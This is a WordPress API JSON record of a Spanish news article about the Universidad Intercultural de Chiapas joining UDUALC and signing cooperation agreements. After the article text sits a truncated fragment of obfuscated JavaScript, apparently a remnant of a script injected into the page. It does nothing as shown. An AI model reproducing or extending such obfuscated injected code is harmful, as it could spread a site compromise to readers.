{"id":20551,"date":"2025-02-24T06:13:32","date_gmt":"2025-02-24T06:13:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20551"},"modified":"2025-02-24T06:13:32","modified_gmt":"2025-02-24T06:13:32","slug":"la-unich-forma-parte-de-la-udualc-firma-convenio-con-la-up-de-chiapas-y-se-suma-al-observatorio-latinoamericano-del-sni","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20551","title":{"rendered":"La UNICH forma parte de la UDUALC, firma convenio con la UP de Chiapas y se suma al Observatorio Latinoamericano del SNI"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250223-WA0007-1024x576.jpg\" alt=\"\" class=\"wp-image-20552\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250223-WA0007-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250223-WA0007-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250223-WA0007-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250223-WA0007-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250223-WA0007.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edgue\/ Corresponsal<\/p>\n\n\n\n<p>23 de febrero del 2025. San Crist\u00f3bal de Las Casas.- El Dr. Roberto Escalante Semerena, Secretario General de la Uni\u00f3n de Universidades de Am\u00e9rica Latina y El Caribe, anunci\u00f3 que la Universidad Intercultural de Chiapas (UNICH), cuyo rector es el Dr. Javier L\u00f3pez S\u00e1nchez, forma parte de esta uni\u00f3n. El anuncio se realiz\u00f3 en el marco del D\u00eda Mundial de la Lengua Materna, que se celebr\u00f3 este fin de semana con actividades culturales, mesas de trabajo, ponencias, entre otras, y cont\u00f3 con la presencia del Secretario de Educaci\u00f3n, Dr. Roger Mandujano Ayala, como testigo de honor.<\/p>\n\n\n\n<p>\u201cEn este marco de celebraci\u00f3n de la vida, quiero anunciar con enorme placer y alegr\u00eda que la Universidad Intercultural del Pueblo, Universidad Intercultural de Chiapas, es parte de la Uni\u00f3n de Universidades de Am\u00e9rica Latina y El Caribe. Quiero decir que los recibimos con enorme gusto, porque vamos a tener la oportunidad de compartir, y eso es uno de los goces m\u00e1s grandes que pueden tener los seres humanos: compartir y estar juntos en las buenas y en las malas. Cuando recibimos a la Universidad Intercultural de Chiapas, a su rector, quien recibir\u00e1 este documento, los recibimos a todos ustedes: a las mujeres estudiantes, a los hombres, a las profesoras, profesores y trabajadores, porque las universidades son sus comunidades, y todas ellas son enormemente bienvenidas. Les agradezco que hayan aceptado esta invitaci\u00f3n\u201d, dijo.<\/p>\n\n\n\n<p>En este marco, se realiz\u00f3 la firma del convenio de colaboraci\u00f3n entre la Universidad Intercultural de Chiapas y la Universidad Polit\u00e9cnica de Chiapas, con la firma de la rectora, Dra. Indra Ruth Toledo Couti\u00f1o, \u201clo que no solo representa un paso adelante en la formalizaci\u00f3n de nuestra relaci\u00f3n, sino que simboliza nuestro compromiso compartido con la educaci\u00f3n, la investigaci\u00f3n y el desarrollo social de nuestra entidad\u201d.<\/p>\n\n\n\n<p>\u201cLa colaboraci\u00f3n entre nuestras universidades es fundamental, ya que impulsa nuestras fortalezas y enriquece las propuestas educativas. Al unir esfuerzos acad\u00e9micos, talentos y conocimientos, abrimos un abanico de posibilidades que beneficiar\u00e1n a los estudiantes y a la comunidad en general. Juntos trabajaremos en proyectos conjuntos, intercambios acad\u00e9micos y programas de investigaci\u00f3n que fomentar\u00e1n la innovaci\u00f3n y la inclusi\u00f3n\u201d, dijo en su intervenci\u00f3n la rectora de la Polit\u00e9cnica.<\/p>\n\n\n\n<p>En este encuentro tambi\u00e9n se formaliz\u00f3 la alianza entre la UNICH y el Observatorio Latinoamericano del Sistema Normativo Ind\u00edgena, anunciada por el presidente, Dr. Miguel \u00c1ngel Carballido D\u00edaz, quien subray\u00f3 que el rector Javier L\u00f3pez fue uno de los fundadores.<\/p>\n\n\n\n<p>\u201cLa primera observaci\u00f3n que nos hizo al momento de fundar este observatorio fue que no solo deber\u00edamos estar atentos a lo que se produc\u00eda en los sistemas normativos mexicanos, sino que tambi\u00e9n deber\u00edamos observar lo que sucede con los derechos humanos de los pueblos y comunidades ind\u00edgenas\u201d, record\u00f3 finalmente Miguel \u00c1ngel Carballido.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edgue\/ Corresponsal 23 de febrero del 2025. San Crist\u00f3bal de Las Casas.- El Dr. Roberto Escalante Semerena, Secretario General de la Uni\u00f3n de Universidades de Am\u00e9rica Latina y El Caribe, anunci\u00f3 que la Universidad Intercultural de Chiapas (UNICH), cuyo rector es el Dr. Javier L\u00f3pez S\u00e1nchez, forma parte de esta uni\u00f3n. El anuncio se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20552,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20551","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20551","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20551"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20551\/revisions"}],"predecessor-version":[{"id":20553,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20551\/revisions\/20553"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20552"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20551"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20551"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20551"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}